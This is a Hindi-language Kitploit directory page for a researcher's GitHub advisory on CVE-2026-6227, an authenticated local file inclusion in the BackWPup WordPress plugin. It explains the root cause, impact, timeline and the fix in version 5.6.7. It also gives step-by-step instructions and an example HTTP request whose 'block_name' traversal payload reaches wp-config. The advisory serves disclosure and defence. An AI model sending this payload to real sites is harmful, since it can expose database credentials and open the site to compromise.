Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-6227 — CVE-2026-6227 के लिए शैक्षिक प्रूफ-ऑफ-कॉन्सेप्ट, जो BackWPup WordPress प्लगइन में एक प्रमाणित Local File Inclusion है, जिसमें root cause analysis, exploit request, और mitigation guidance शामिल है। | Kitploit
उपकरण/GitHubGitHub/pixel-defaultbr/cve-2026-6227
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेपर और शोधलर्निंग और शिक्षा
GitHubpixel-defaultbr/cve-2026-6227

CVE-2026-6227

CVE-2026-6227 के लिए शैक्षिक प्रूफ-ऑफ-कॉन्सेप्ट, जो BackWPup WordPress प्लगइन में एक प्रमाणित Local File Inclusion है, जिसमें root cause analysis, exploit request, और mitigation guidance शामिल है।

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-6227: बैकWPअप में लोकल फाइल इन्क्लूज़न

CVSS Version Researcher

सलाहकार सारांश

BackWPup के 5.6.6 तक के संस्करण /wp-json/backwpup/v1/getblock REST एंडपॉइंट के block_name पैरामीटर के माध्यम से एक प्रमाणित लोकल फाइल इन्क्लूज़न (LFI) भेद्यता से प्रभावित हैं।

यह दोष ट्रैवर्सल अनुक्रमों के गैर-पुनरावर्ती str_replace() सैनिटाइज़ेशन के कारण हुआ था और इसे संस्करण 5.6.7 में पहले ही ठीक कर दिया गया है।

मेटाडेटा

  • CVE: CVE-2026-6227
  • गंभीरता: उच्च
  • CVSS स्कोर: 7.2
  • प्रभावित उत्पाद: BackWPup WordPress प्लगइन
  • प्रभावित संस्करण: <= 5.6.6
  • ठीक किया गया संस्करण: 5.6.7
  • स्थिति: पैच किया गया
  • प्रकटीकरण तिथि: 2026-04-13
  • शोधकर्ता: Pixel_DefaultBR
  • अस्वीकरण

    यह रिपॉजिटरी केवल शैक्षिक और नैतिक सुरक्षा अनुसंधान उद्देश्यों के लिए है। यहां दी गई जानकारी प्रशासकों और सुरक्षा टीमों को उनके सिस्टम सत्यापित करने में मदद करने के लिए है। स्पष्ट, लिखित अनुमति के बिना इसे लक्ष्यों के विरुद्ध उपयोग न करें।

    प्रभावित सतह

    • फ़ंक्शन: BackWPupHelpers::component()
    • एंडपॉइंट: POST /wp-json/backwpup/v1/getblock
    • पैरामीटर: block_name
    • एक्सेस स्तर: प्रमाणित व्यवस्थापक (या बैकअप अनुमतियाँ सौंपे गए उपयोगकर्ता)

    मूल कारण विश्लेषण

    कमजोर घटक लोडर include() को आमंत्रित करने से पहले एक गैर-पुनरावर्ती str_replace() सैनिटाइज़ेशन लागू करता है। इसे ....// या ..././ जैसे क्राफ्टेड ट्रैवर्सल पैटर्न का उपयोग करके बायपास किया जा सकता है, जिससे हमलावर-नियंत्रित पथ समाधान की अनुमति मिलती है।

    प्रभाव

    • सर्वर फाइल सिस्टम से मनमाना स्थानीय PHP फाइल इन्क्लूज़न
    • संभावित संवेदनशील डेटा एक्सपोज़र (उदाहरण के लिए, wp-config.php)
    • विशिष्ट सर्वर/एप्लिकेशन कॉन्फ़िगरेशन में संभावित रिमोट कोड निष्पादन

    डिफ़ॉल्ट रूप से, शोषण के लिए व्यवस्थापक-स्तरीय पहुंच की आवश्यकता होती है। यदि बैकअप अनुमतियाँ सौंपी गई हैं, तो कम-विशेषाधिकार वाले उपयोगकर्ता भी इस समस्या का शोषण करने में सक्षम हो सकते हैं।

    शोषण पूर्व शर्तें

    • मान्य प्रमाणित WordPress सत्र
    • मान्य REST नॉन्स
    • व्यवस्थापक विशेषाधिकार या सौंपी गई बैकअप अनुमतियाँ

    प्रमाण की अवधारणा

    परिदृश्य: लोकल फाइल इन्क्लूज़न

    1. BackWPup जॉब क्षमता वाले खाते का उपयोग करके WordPress में लॉग इन करें।
    2. प्लगइन UI से एक सामान्य अनुरोध ट्रिगर करें और प्रॉक्सी के साथ ट्रैफ़िक को इंटरसेप्ट करें।
    3. /wp-json/backwpup/v1/getblock के लिए एक वैध POST अनुरोध का पता लगाएं।
    4. block_name को ट्रैवर्सल पेलोड से बदलें।

    उदाहरण अनुरोध:

    root@kitploit:~
    POST /wp-json/backwpup/v1/getblock HTTP/1.1
    Host: target.example.com
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-WP-Nonce: <your_nonce_here>
    Cookie: wordpress_logged_in_<hash>=<your_session_cookie>
    
    block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
    
    1. फाइल इन्क्लूज़न व्यवहार को सत्यापित करने के लिए प्रतिक्रिया का निरीक्षण करें।

    समयरेखा

    • 2026-03: भेद्यता विक्रेता को रिपोर्ट की गई
    • 2026-03-25: विक्रेता पैच 5.6.7 में जारी किया गया
    • 2026-04-13: सार्वजनिक प्रकटीकरण (CVE-2026-6227)

    शमन

    • BackWPup को संस्करण 5.6.7 या बाद में अपडेट करें
    • backwpup क्षमता का असाइनमेंट केवल विश्वसनीय भूमिकाओं तक सीमित रखें
    • /wp-json/backwpup/v1/getblock तक संदिग्ध पहुंच के लिए ऑडिट लॉग की समीक्षा करें

    संदर्भ

    • विक्रेता प्लगइन पृष्ठ: https://wordpress.org/plugins/backwpup/
    • CVE संदर्भ (Wordfence): https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter
    टूल डाउनलोड करें